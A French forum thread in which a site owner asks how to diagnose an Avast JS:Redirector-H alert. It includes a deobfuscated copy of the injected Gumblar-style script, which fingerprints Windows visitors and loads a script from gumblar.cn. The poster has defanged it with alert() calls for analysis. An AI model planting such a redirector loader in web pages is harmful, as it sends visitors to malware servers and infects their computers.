Discussion :

[keaton7]

Bonjour,

Le avast d'un ami s'affole lorsqu'il visite son site. Une alerte JS:Redirector-H [Trj] retenti. Il apparait que ce cheval de troie infecte effectivement els serveurs webs. Mais en telechargeant les pages et en les scannant, aucun probleme n'apparait, aucun script malicieux insere "apparemment".

Ma question est la suivante, existe-t-il des outils pour analyser des url ? Comment detecter ce genre de virus ? Je soupconne egalement tout simplement l'ordinateur du visiteur d'etre infecte ...

Avez vous une idee ?

[pi-2r]

Bonsoir,
tu peux essayer de regardé la page infecter avec le logiciel malzilla.

Bon courage

[keaton7]

Bonjour,

regardé la page infecter avec le logiciel malzilla.

Je t'avoues que je ne comprend pas grand chose a ce soft. Comment l'analyserais-tu ?

[pi-2r]

Bonsoir,

Bonjour,
Je t'avoues que je ne comprend pas grand chose a ce soft. Comment l'analyserais-tu ?

tu coinces ou ?

[keaton7]

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var a="ScriptEngine",
b="Version()+",j="",

u=navigator.userAgent;

if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){

	zrvzts="A";
	eval("alert(a)")
	eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
	
	document.write("<script>alert('src=//gumblar.cn/rss/?id="+j+"')<\/script>");
	
}

Je pense que l'url renvoi juste l'id de la station infectée et que le script propage par la faille scriptEngine un ver sur la machine du visiteur. Je repère window.scriptEngine dans le script et les seuls résultats sur Google sont des alertes de securite ...

Un débordement de mémoire dans la bibliothèque qui gère les programmes de type JSscript (JScript.dll) permet à un utilisateur mal intentionné d'exécuter du code arbitraire sur la machine de sa victime, par le biais d'une page web ou d'un mél au format HTML.

Source : http://www.certa.ssi.gouv.fr/site/CERTA-2003-AVI-054/

Un script malveillant a été ajouté à ces pages attaquées, qui redirige les visiteurs vers des serveurs malveillants exploités par les attaquants et qui entraine l’infection des ordinateurs des utilisateurs.

Source : http://www.avast.com/fre/press-relea...d-ab-trj-.html

Merci windows ...